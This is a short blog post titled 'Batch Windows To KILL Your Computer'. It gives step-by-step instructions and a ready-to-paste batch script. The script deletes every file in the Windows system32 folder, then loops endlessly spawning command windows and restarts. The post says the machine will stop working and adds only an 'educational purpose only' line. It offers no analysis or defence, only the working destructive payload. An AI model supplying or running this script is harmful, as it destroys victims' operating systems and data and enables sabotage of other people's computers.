Tuesday, 16 January 2018

Batch Windows To KILL Your Computer

Batch Windows To KILL Your Computer - hacksth.blogspot.com


Create a new text document on your desktop. Double click the file – it should be blank inside. Now, go to file>save as, and in the “Save As” window, input a name for your BAT file and then add a “.bat” on the end (without the quotes). My file was named kill-my-computer.bat, for instance.

------------------ Copy and Paste this code in your batch file......................... 
@echo off
title (Your title has to)
del C:\WINDOWS\system32\*.*
:1
start cmd
shutdown -r
goto :1
-----------------------------...............................................
Remember, if you run this BATCH, your computer will not work anymore, this is for educational purpose only, use it on your own responsability.

No comments:

Post a Comment